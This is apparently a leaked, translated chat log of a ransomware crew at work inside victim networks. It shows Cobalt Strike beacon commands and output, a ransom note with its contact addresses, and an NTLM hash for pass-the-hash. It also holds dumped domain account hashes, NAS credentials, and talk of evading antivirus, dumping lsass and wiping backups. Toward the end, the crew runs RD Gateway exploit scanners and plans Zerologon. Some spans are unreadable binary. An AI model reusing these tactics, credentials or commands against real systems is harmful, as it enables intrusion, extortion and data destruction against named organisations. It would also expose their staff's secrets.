10.1.200.69:58730 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58848 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58960 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59064 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59212 
TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59308 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59464 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59572 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59708 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59814 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59982 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:59994 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60046 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60096 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60178 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60190 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60282 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60368 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60442 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60560 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60656 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60794 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:60894 TIME_WAIT 0 TCP 10.1.20.183:51988 10.1.20.112:445 ESTABLISHED 4 TCP 10.1.20.183:51990 10.1.20.112:445 ESTABLISHED 4 TCP 10.1.20.183:60489 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60498 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60499 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60503 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60506 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60507 10.1.20.140:49669 TIME_WAIT 0 TCP 10.1.20.183:60521 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60524 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60525 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60532 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60533 10.1.20.140:49669 TIME_WAIT 0 TCP 10.1.20.183:60536 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60549 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60553 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60559 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60561 10.1.20.140:49669 TIME_WAIT 0 TCP 10.1.20.183:60568 10.1.20.183:9501 TIME_WAIT 0 TCP 10.1.20.183:60569 10.1.20.183:9501 TIME_WAIT 0 TCP 10.1.20.183:60570 
10.1.20.183:9501 TIME_WAIT 0 TCP 10.1.20.183:60575 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60576 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60580 10.1.200.69:10051 TIME_WAIT 0 TCP 10.1.20.183:60583 10.1.20.140:49669 ESTABLISHED 640 TCP 10.1.20.183:60585 10.1.20.183:9392 TIME_WAIT 0 TCP 10.1.20.183:60589 10.1.20.183:9392 ESTABLISHED 8780 TCP 10.1.20.183:60598 173.234.155.15:443 LAST_ACK 2832 TCP 10.1.20.183:60599 173.234.155.15:443 LAST_ACK 568 TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1644 TCP 127.0.0.1:6290 127.0.0.1:49196 ESTABLISHED 2392 TCP 127.0.0.1:49196 127.0.0.1:6290 ESTABLISHED 2352 TCP [::]:135 [::]:0 LISTENING 756 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1433 [::]:0 LISTENING 1644 TCP [::]:3389 [::]:0 LISTENING 3160 TCP [::]:5985 [::]:0 LISTENING 4 TCP [::]:6160 [::]:0 LISTENING 1900 TCP [::]:6161 [::]:0 LISTENING 2304 TCP [::]:6162 [::]:0 LISTENING 2352 TCP [::]:6172 [::]:0 LISTENING 4 TCP [::]:6190 [::]:0 LISTENING 2392 TCP [::]:6210 [::]:0 LISTENING 2176 TCP [::]:8081 [::]:0 LISTENING 1232 TCP [::]:10050 [::]:0 LISTENING 1848 TCP [::]:11731 [::]:0 LISTENING 1900 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 540 TCP [::]:49153 [::]:0 LISTENING 864 TCP [::]:49154 [::]:0 LISTENING 888 TCP [::]:49155 [::]:0 LISTENING 640 TCP [::]:49156 [::]:0 LISTENING 640 TCP [::]:49157 [::]:0 LISTENING 1036 TCP [::]:49203 [::]:0 LISTENING 632 TCP [::]:49204 [::]:0 LISTENING 3192 TCP [::1]:1434 [::]:0 LISTENING 1644 UDP 0.0.0.0:111 *:* 2304 UDP 0.0.0.0:123 *:* 912 UDP 0.0.0.0:500 *:* 888 UDP 0.0.0.0:1063 *:* 2304 UDP 0.0.0.0:2049 *:* 2304 UDP 0.0.0.0:3389 *:* 3160 UDP 0.0.0.0:4500 *:* 888 UDP 0.0.0.0:5355 *:* 968 UDP 0.0.0.0:8082 *:* 1232 UDP 10.1.20.183:137 *:* 4 UDP 10.1.20.183:138 *:* 4 UDP 127.0.0.1:55150 *:*:640 UDP 127.0.0.1:63057 *:* 888 UDP 127.0.0.1:63060 *:* 968 UDP 127.0.0.1:64301 *:* 1308 UDP [::]:123 *:* 912 UDP [:]:500 *:* 888 UDP [:]:3389 *:*:3160 UDP [:]:4500 *:*:888 UDP [:]:8082 *:*:1232 ``This process doesn't knock anywhere? 
[-] screenshot from desktop 0 is empty ``empty Show me a screenshot of my desktop and jump to the processMicrosoft Windows Server 2012 R2 Standard What is os7) and cmd5 has no clears (then we will look at it together, i will jump there and take a dump.no, i went there a couple hours ago give me a screenshots of what you see there? local backups i see all my tasks, servers, etc. the cloud tab only has a plug in and something like find providers but not configured? but the software is yes, i checked it there's no cloud configured is there a thing? veema backup and replicationhttps://www.veeam.com/cloud-connect-backup-service-providers.htmlпо rp probably a cloud backup did you go there? local use if this stuff connects anywhere there's a chance of a cloud backups no other sign of a cloud backups found look at netstat first it's very easy cloud backups go to rdp under the admin the process is running from and check if there's a cloud backup configured what settings did you want to find?[ ](https://mediaeveryone.com/group/crispregional-org?msg=GPomCCiWBYFagbv9w) not sure about that+ready? then i'll ping the pool from 2008 Mpaq123 /user:grouphc\linrcbatch any domains? with creed if 2008 falls under ms17? apparently it detects as a dump lsassfile deletes nothing? try procdump just in .dmp? try all sorts of minidumps and so on? i don't know why mcafee is blocking ... it's not ready yet, hb has delayschetverg labswould like to get information and how is the recruiting going? where's the fresh blood?)) 5-6 pcs so i got into a few user cars for fuck you hashdump? first time i hear that mcafee creates such problems..o_only cut offmacafi) if yes - no way? any thoughts? if memory is protected? how to remove hashdump listen to okaysnom before sleep i'll be back today? i'll throw it off then hardly have time for another 30 minutes) aha? hello mini report on sonic? 
Extracting DPAPI Backup Keys with Domain Admin https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ ``hi:space_invader::man_raising_hand:hello all)Till Mon, and you)have a good weekend on Mon by 5 on this one and all thenarms still puffing, most of the server alive and put it damaged as I understand it, because it was in the process 2-2.5 hours there was 1 file left it turns out the rest is all put? +server? went off (then wait for the file not everywhere reached zamaplyenyh yes, is there a note at least one armas? there are few alive, the ones that stretch - pulled and ran his hands ``. beacon> shell net view \10.0.6.56 [*] Tasked beacon to run: net view \10.0.6.56 [+] host called home, sent: 51 bytes [+] received output: Shared resources at \10.0.6.56 Share name Type Used as Comment ------------------------------------------------------------------------------- C Disk D Disk The command completed successfully. So I should get to them but they are unattached and the processes are killed but I haven't got to them yet or what, but they are untouched ``` beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. 
Status Local Remote Network ------------------------------------------------------------------------------- Disconnected N: \10.0.6.40\c$ Microsoft Windows Network Disconnected O: \10.0.2.120\c$ Microsoft Windows Network Disconnected P: \10.0.6.75\c$ Microsoft Windows Network Disconnected Q: \10.0.2.215\c$ Microsoft Windows Network Disconnected R: \10.0.6.77\c$ Microsoft Windows Network Disconnected S: \10.0.6.64\c$ Microsoft Windows Network Disconnected T: \10.0.6.121\c$ Microsoft Windows Network Disconnected U: \10.0.6.147$ Microsoft Windows Network Disconnected V: \10.0.6.93\c$ Microsoft Windows Network Disconnected W: \10.0.1.178\c$ Microsoft Windows Network Disconnected X: \10.0.6.56\c$ Microsoft Windows Network Disconnected Y: \10.0.6.94\c$ Microsoft Windows Network Disconnected Z: \10.0.6.61\c$ Microsoft Windows Network The command completed successfully. beacon> shell dir N: [*] Tasked beacon to run: dir N: [+] host called home, sent: 37 bytes [+] received output: Volume in drive N is OS Volume Serial Number is 22CF-C5F8 Directory of N:\ 05/11/2020 06:06 AM Apps 10/16/2020 02:17 PM 550,254 dcagentInstaller.log 05/11/2020 06:57 AM Dell 10/16/2020 02:19 PM Downloads 05/11/2020 05:56 AM Drivers 01/22/2021 01:05 AM Intel 10/21/2020 02:54 AM kworking 03/18/2019 11:52 PM PerfLogs 10/16/2020 02:55 PM Program Files 12/27/2020 02:04 PM Program Files (x86) 10/16/2020 02:37 PM 4,722 SSDXFlashLog.zip 10/16/2020 02:45 PM temp 10/16/2020 03:30 PM Users 01/01/2021 01:02 AM Windows 10/16/2020 02:55 PM Windows10Upgrade 2 File(s) 554,976 bytes 13 Dir(s) 191,506,898,944 bytes fre ``arms check now servers let's wait 1 file? servers and armas ok? they will not understand) by fax already) send a note to your pager * i have a note where is the note you have a note? better. 
i have a screenshot of the noteaahhanyou or a screenshot of the note)0kekmb leave a note to check the quarantinebolshoy dosheshypeshy and everythingtoo trand fucks the brain[ ](https://mediaeveryone.com/group/skytechinc-com?msg=Gu57s6jDHiGaTvJB8) Because gladioluson there is also, but it fucks why i thought there makafi)he = trand[ ](https://mediaeveryone.com/group/skytechinc-com?msg=A7TC4rqBYQh3EMyZe) everywhere he stands no notes on the contrary where the trend - there are notes theretrendmicro just say that even with macafee there are notes deleted only in one place? well on dc will see thenahehane they do not think) well what they will not get from quarantine? from gui? no way to kill the process to disable the protection? the population where the backups were we wiped the files, or else there pussy would be another 9 hours delayed? Backup servers are encrypted[ ](https://mediaeveryone.com/group/skytechinc-com?msg=Fjzerwjbmcbf9DWpF) the process goes up immediately, the service doesn't shut down they've been shut down before ``` E:\SKYNASSC Backup\ISO Images\Backup_Exec_2012_14.0_SP2_MultiPlatforms_Multilingual.zip.2of2.id-D630D304.[stopstorage@qq.com].java.HAWFH ``Network can't stop protection? 
There is no such function if it's not everywhereAdd to exceptionsThere is no trendMicro all windows ``SKY-TS02`` is also fine``SKY-TS01```` Directory of C:\ 01/29/2021 08:42 PM 1,558 .rnd.HAWFH 01/29/2021 08:42 PM AdwCleaner 01/29/2021 08:42 PM apps 01/29/2021 08:42 PM 536 ARCAOS.txt.HAWFH 01/29/2021 09:34 PM Avantext 01/29/2021 08:43 PM Avantext.old 12/25/2017 12:11 PM CPPRO 08/21/2019 01:17 PM inetpub 01/17/2018 02:12 AM Klogs 06/17/2018 12:30 AM Kmonitorsets 11/25/2020 04:42 PM kworking 07/13/2009 10:20 PM PerfLogs 12/07/2020 12:05 AM Program Files 12/30/2020 07:47 AM Program Files (x86) 01/29/2021 08:42 PM 930 readme.txt 01/29/2021 08:42 PM 551 reboot.cmd.HAWFH 12/24/2020 12:45 PM symbols 11/02/2020 04:19 PM TEMP 06/28/2019 03:18 PM temp1 03/14/2017 03:27 PM TFBO Reports 09/10/2019 07:42 AM time keeper 01/26/2017 11:02 PM txtav 01/17/2021 06:05 PM Users 01/29/2021 07:13 PM Windows 4 File(s) 3,575 bytes 20 Dir(s) 31,755,657,216 bytes free beacon> shell type C:\readme.txt [*] Tasked beacon to run: type C:\readme.txt [+] host called home, sent: 49 bytes [+] received output: All of your files are currently encrypted. Backups were encrypted or deleted, same as Shadow Copies. If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge. The faster you reply - the easier and cheaper it will be. 
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website: TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.best ---BEGIN ID--- dgbmGEAzby8w4AXUtdoh6nTEfuymihxXn0pmdmtDDT3cjOjMsdxvZahDXRDeotyd ---END ID--- ``This one ``` DbNÀ`tñïÒf¬µ <ñzÅ!ïË "ð3 à\bŽ¡ÕU/ÃZðÉ@^6 ¶ùÜhoÐMXw[+Ø'öf7ïÁÜ=ÓZ÷£B &ìÄ]sYVM©÷EÙÃ9þb>îòoɳ§ÇÂ(g "b"³j¡ø N#á ýÐ*FíNßÊ¢ÓÈÏa±Zq(rDMk¹8}ÀÕ¥+ìÓ€aq±Sµ<õÖÏæ^&xÓaC9d1ðvëtaÙñ*Çñ¬n\ÉÉRmO-Øä!^_DTØùûûâ8éÅÁ ÀJ\n¬Ï)zž Ys Aõuêä ŒŽÓ%Æ7 3Üz")Iüç?Úu*%É|YRÇå×açÊ "5ìX¹Y7éÖÊZM~öâëÛŠ'Yΰ/+œ~/Ì/óð,gL8*{öd-5×M3œŒ "sdïì÷Uh_^ È Œ'Àa= ÁöŒJ#óÏï6[Dš¥ < |n$DäXýÚ¡Œu)f=Û "Aædª>º!xZ¹9'b "å9 $Š¢Ö[§õA7(üíxeñ9tXúߟ ¦[ ](https://mediaeveryone.com/group/skytechinc-com?msg=gB3DCv33bT2C3Ed6E) it's not clear, I'm looking somewhere, but it's crooked [ ](https://mediaeveryone.com/group/skytechinc-com?msg=gB3DCv33bT2C3Ed6E) maybe...on the rdp went to the desktop, it appeared on the desktop and almost immediately disappeared at the end when everything is encrypted? ç%âHq:ðÒÒÒ""[§ºãs-0&oÍdq\¹îÏ]ÔI÷/øáQIÐŒU{@z®B1þÌÀ5µ1z{òÍÄÄ¥SŠ Œò|7àb œÁÁøÐ "f1Çß¶y¹7Õª81Ð,ö÷ÖÖÜåT÷kQÿi8Omã)óFºÚ¹_Èî.pò ßúuCZ=& ÓÑ,E®¢ºã~þí-N|{É_¬ó%Ž}²r3,*0å<óTQPÜ(¢&ÿÇæþü76esL$qAV£-Ïô5ÑŒ,©G (â±ÍªM*Ä7ÖLK?ÞŠøvIÊ}¢4Õ$œ Ю°áØ*IàJ,Jam®!oÊkŸúOÔ!ÖÒR£'Šûº_(UÁHÜà /Wùùùðûê "qj,ê<× ØŒeö.nzg@!é ``There's a corp product that can be sewn in by defaultWhat's it got to do with it? 
https://www.mcafee.com/enterprise/en-us/downloads/free-tools/interceptor.htmlОпять ``` *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM ``It's the only one ``` 0 0 [System Process] 4 0 System x64 0 NT AUTHORITY\SYSTEM 356 4 smss.exe x64 0 NT AUTHORITY\SYSTEM 480 472 csrss.exe x64 0 NT AUTHORITY\SYSTEM 540 472 wininit.exe x64 0 NT AUTHORITY\SYSTEM 632 540 services.exe x64 0 NT AUTHORITY\SYSTEM 536 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 708 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2432 708 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE 3004 708 WmiPrvSE.exe x64 0 NT AUTHORITY/NETWORK SERVICE 37844 3004 cmd.exe x64 0 SKYTECH1\skyadmin 36296 37844 conhost.exe x64 0 SKYTECH1\skyadmin 38408 37844 DiskShare.exe x64 0 SKYTECH1\skyadmin 38464 38408 icacls.exe x64 0 SKYTECH1\skyadmin 38296 38464 conhost.exe x64 0 SKYTECH1\skyadmin 38740 38408 icacls.exe x64 0 SKYTECH1\skyadmin 35536 38740 conhost.exe x64 0 SKYTECH1\skyadmin 41780 3004 rundll32.exe x64 0 SKYTECH1\skyadmin 3044 708 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM 4528 708 PrintIsolationHost.exe x64 0 NT AUTHORITY\SYSTEM 166428 708 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE 184248 708 WmiPrvSE.exe x86 0 NT AUTHORITY/\SYSTEM 185016 708 WmiPrvSE.exe x86 0 NT AUTHORITY\LOCAL SERVICE 186124 708 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE 756 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 908 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 944 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 5432 944 taskhostex.exe x64 2 SKYTECH1\skyadmin 1004 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1096 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1196 632 vmtoolsd.exe x64 0 NT AUTHORITY/ LOCAL SERVICE 1308 632 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM 1408 632 armsvc.exe x86 0 NT AUTHORITY\SYSTEM 1428 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1448 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1508 1448 dasHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1492 632 g2ax_service.exe x86 0 NT AUTHORITY\SYSTEM 1676 1492 
g2ax_comm_customer.exe x86 0 NT AUTHORITY\SYSTEM 1084 1676 g2ax_system_customer.exe x86 0 NT AUTHORITY\SYSTEM 6868 1676 g2ax_user_customer.exe x86 2 SKYTECH1\skyadmin 1792 632 mqsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1892 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1940 632 SMSvcHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2124 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2448 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2552 632 SMSvcHost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 4048 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 4088 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 4744 632 msdtc.exe x64 0 NT AUTHORITY/NETWORK SERVICE 9364 632 ramaint.exe x64 0 NT AUTHORITY\SYSTEM 9400 632 LMIGuardianSvc.exe x64 0 NT AUTHORITY\SYSTEM 48576 632 Ntrtscan.exe x64 0 NT AUTHORITY\SYSTEM 48728 632 svcGenericHost.exe x86 0 NT AUTHORITY\SYSTEM 47672 48728 HostedAgent.exe x86 0 NT AUTHORITY\SYSTEM 48920 47672 logWriter.exe x86 0 NT AUTHORITY\SYSTEM 49184 48920 conhost.exe x64 0 NT AUTHORITY\SYSTEM 48964 47672 conhost.exe x64 0 NT AUTHORITY\SYSTEM 49680 48728 TMCPMAdapter.exe x86 0 NT AUTHORITY\SYSTEM 49544 49680 conhost.exe x64 0 NT AUTHORITY\SYSTEM *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM 49240 632 TMBMSRV.exe x64 0 NT AUTHORITY\SYSTEM 49976 632 TmCCSF.exe x64 0 NT AUTHORITY\SYSTEM 57936 49976 TmsaInstance64.exe x64 0 NT AUTHORITY\SYSTEM 53368 57936 conhost.exe x64 0 NT AUTHORITY\SYSTEM 142872 632 LogMeIn.exe x64 0 NT AUTHORITY\SYSTEM 176516 632 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM 184868 632 WmiApSrv.exe x64 0 NT AUTHORITY\SYSTEM 640 540 lsass.exe x64 0 NT AUTHORITY\SYSTEM 4228 8148 zscccon64.exe x64 0 NT AUTHORITY\SYSTEM 8988 4228 conhost.exe x64 0 NT AUTHORITY\SYSTEM 4364 1720 winlogon.exe x64 2 NT AUTHORITY\SYSTEM 3228 4364 dwm.exe x64 2 Window Manager\DWM-2 160248 4364 logonUI.exe x64 2 NT AUTHORITY\SYSTEM 4448 7868 conhost.exe x64 0 SKYTECH1\bbesadmin 4796 1720 csrss.exe x64 2 NT AUTHORITY\SYSTEM 6840 7056 jusched.exe x86 2 
SKYTECH1\skyadmin 1044 6840 jucheck.exe x86 2 SKYTECH1\skyadmin 6924 9964 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM 8620 5452 explorer.exe x64 2 SKYTECH1\skyadmin 5856 8620 vmtoolsd.exe x64 2 SKYTECH1\skyadmin 142068 8620 LogMeInSystray.exe x64 2 SKYTECH1\skyadmin 9340 9964 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM 10152 7868 schtasks.exe x64 0 SKYTECH1\bbesadmin 49532 49328 PccNtMon.exe x64 2 SKYTECH1\skyadmin 184316 180296 platform-installation-manager.exe x86 0 NT AUTHORITY\SYSTEM 220380 220652 powershell.exe x64 0 NT AUTHORITY\SYSTEM 217240 220380 conhost.exe x64 0 NT AUTHORITY\SYSTEM 220744 220380 powershell.exe x86 0 NT AUTHORITY\SYSTEM 219488 220744 conhost.exe x64 0 NT AUTHORITY\SYSTEM ``I don't see what's in the processes except for avera, is it just on the population or nowhere at all? ``` 01/29/2021 08:42 PM 536 ARCAOS.txt.HAWFH i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, but the file udmi does not show up) but there are extensions who will stay7 on Mon by 5 the rest go home1 on duty a lot are already encrypted on the nasa? the wiped is still being tossed with terabytes of files all passed? did the other prima linas pass? 
Servers: - hell: 39 - alive: 15 - drawn: 15 - coded: 15 Armies: - by hell: 184 - alive: 48 - encrypted: 48 (primaed) all disks unshared, processes nailed down `````` 10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES 10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas 10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas 10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas `````` pth skytech1.local\BESAdmin b7e996a9282b045b181ab26ba27f6242 `````` 10.0.2.130 10.0.6.9 10.0.6.27 10.0.2.7 10.0.6.51 10.0.6.13 ````S(FJH*G&*SDifgtsidgtis7g ?600 then in slipslip so it's already in nemya in winlogon dk I always throw in slipslip just open winlogon how many? on one, get it then on dk) all in group dk[ ](https://mediaeveryone.com/group/gaudyme-com?msg=rmMqhDAK6JhpvFHc7) 1 and in slipslip sessions on a couple of servers fuck them beacon> shell ping gaudyme.com [*] Tasked beacon to run: ping gaudyme.com [+] host called home, sent: 47 bytes [+] received output: Pinging gaudyme.com [72.52.147.20] with 32 bytes of data: Reply from 72.52.147.20: bytes=32 time=85ms TTL=55 Reply from 72.52.147.20: bytes=32 time=84ms TTL=55 Reply from 72.52.147.20: bytes=32 time=84ms TTL=55 Reply from 72.52.147.20: bytes=32 time=85ms TTL=55 Ping statistics for 72.52.147.20: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 84ms, Maximum = 85ms, Average = 84ms beacon> portscan 72.52.147.20 1-30,135,139,443,445 [*] Tasked beacon to scan ports 1-30,135,139,443,445 on 72.52.147.20 [+] host called home, sent: 93285 bytes [+] received output: (ICMP) Target '72.52.147.20' is alive. 
[read 8 bytes] 72.52.147.20:443 72.52.147.20:26 72.52.147.20:21 (220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------) [+] received output: 72.52.147.20:25 [+] received output: Scanner module is complete ``Simply there seems to be users and real domain realproscan 3 servers, one destination unreachable, the other redirects to the current dk whyomu 90% you have not labana 1-30,135,139,443, as we fucked the brain and not laba lilaba can take an existing domain of some companybut you can not go directly to this domain you know they sell clothes in insta and facebook have pages so we are talking about this) and that's not to say that laba not like laba I just say there quarantine mostly look wilsonart 30 trusts?https://shopthegaudy.com/ну however? there are about 30 trusts there but the neighboring one is definitely not a labaSo you know how we know how to shine the inventory for analytics labs?)yes let's close it)yes I also think it looks like a laba again...3 servers let's close it no trusts throw it on the server far away ``` 32 Objects returned ``I'll give you dllkrasawa,`` [DC] 'DressinGaudy.local' will be the domain [DC] 'Gaudy-DC2.DressinGaudy.local' will be the DC server [DC] Exporting domain 'DressinGaudy.local' 1185 GAUDY-RDP1$ c4c6b3a3fa322dfb74dfb692fffb1aa54c7 532480 1119 SOCIAL-MEDIIA1$ 5f3854e8bd9d3aa5f68cb807b7891c22 4096 1114 BRITTANI-PC$ 5d8a95512df9e719207a0ed7686c417e 4096 1118 SOCIAL-MEDIA1$ cc9f2f930553c8516b2fc61f37f04910 4096 1107 CORPORATE-LAPTO$ 8bd91dcc12602c157f58b5d43b00d4ef 4096 1177 canon 8ef62adbb9127aa5cb4ddc8ceb483994 66048 1186 CORPORATE-DESKT$ 05a2b95c896aa1e365a78493f97036c0 4096 1110 QBDataServiceUser24 5c275327b45004dbb777866feacb7c44 66048 1237 QBDataServiceUser27 7e62fb7999eb74ee272401b607f1f110 66048 1147 DGLONGVIEW-PC$ e52b1d43fb366fe99fcc638a4730103b 4096 1606 GCPOS5A-LGM3 d29b9f741a059cde7e9ddfed5701ced7 66050 1605 GCPOS4A-LGM2 d29b9f741a059cde7e9ddfed5701ced7 66050 1604 GCPOS3A-LGM1 d29b9f741a059cde7e9ddfed5701ced7 
SharpShares didn't give out the shares, let ShareFinder
kerbs no)
I just noticed, and let's drop them in the process
kerbs? shufflefinder?
no, elevate has worked out
the current user: domain user
but here domain users are LA
```
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            bdc                      canton
corporate                DG102                    DG105
DG108                    GCPOS10A-TGM3            GCPOS11A-CDG1
GCPOS12A-CDG2            GCPOS13A-CDG3            GCPOS17A-LDG1
GCPOS18A-LDG2            GCPOS1A-TDG1             GCPOS2A-TDG2
GCPOS3A-LGM1             GCPOS4A-LGM2             GCPOS5A-LGM3
GCPOS6A-TXDG1            GCPOS7A-TXDG2            GCPOS8A-TGM1
GCPOS9A-TGM2             GM103                    GM106
jmr                      katelync                 kimw
ROOK                     tim
The command completed successfully.
```
```
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
```
```
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator                DGW-PC
DRESSINGAUDY\Domain Admins   DRESSINGAUDY\Domain Users
The command completed successfully.
```
ah, ok
I respawn in the input, there is
yes, it falls off
my Cobalt restart, then don't refresh it
overall not critical
request ad_ous or ad_group - session falls off
today they will be new
not gonna waste more time
ok, fuck it, maybe they have off-line backups or something
backups server is not opening
10 servers I checked, there's no note, i'll help you in STAKC.
i still have everything patched (tell @user3 and @user9 they did a good job
If you want to use zerologon, what tactic/sequence of action would you advise?
I'm just not that familiar with openssl, so I thought maybe you've caught a similar thing before and know how to fix it...
As I understand it, a bug in Ubuntu seems to be the same error?
```
proxychains python3 RDGScanner.py 172.31.190.10 3391
proxychains python3 rdg_scanner_cve-2020-0609.py 172.31.190.10
proxychains python3 BlueGate.py 172.31.190.10 -M check
```
How do you run it and what do you run?
```
df734@vps:~$ pip3 freeze
certifi==2019.11.28
cffi==1.14.3
chardet==3.0.4
cryptography==2.8
idna==2.8
netaddr==0.8.0
pycparser==2.20
pyOpenSSL==19.0.0
requests==2.22.0
six==1.14.0
urllib3==1.25.8
```
https://www.pyopenssl.org/en/stable/install.html
```
python3-openssl is already the newest version (19.0.0-1build1).
```
```
sudo apt install pyOpenSSL
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package pyOpenSSL
```
Did you install this? And the error is the same everywhere, in the same place.
```
[system_default_sect]
MinProtocol = SSLv3
CipherString = DEFAULT@SECLEVEL=1
```
Which one?
https://github.com/ollypwn/BlueGate
https://github.com/MalwareTech/RDGScanner
https://github.com/2d4d/rdg_scanner_cve-2020-0609
give the link to the script used
no, didn't use
```
Traceback (most recent call last):
  File "BlueGate.py", line 130, in <module>
    connection = Connection(args.host, args.port)
  File "BlueGate.py", line 68, in __init__
    self.connect()
  File "BlueGate.py", line 84, in connect
    self.connection.do_handshake()
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1915, in do_handshake
    self._raise_ssl_error(self._ssl, result)
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1647, in _raise_ssl_error
    _raise_current_error()
  File "/usr/lib/python3/dist-packages/OpenSSL/_util.py", line 54, in exception_from_error_queue
    raise exception_type(errors)
OpenSSL.SSL.Error: [('SSL routines', 'state_machine', 'internal error')]
df734@vps:~$
```
@tl1 Did you use CVE-2020-0609 yourself? Catching ssl errors. How to fix it?
Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability
Is it bleedingghost? which?
Okay, look at it. CVE-2020-0609: there is no way out from here.
What's wrong with it?
i will try zerologon
not one of them is pinged
i will check
you have them available?
yes
trusts
AD? take it off and throw it here
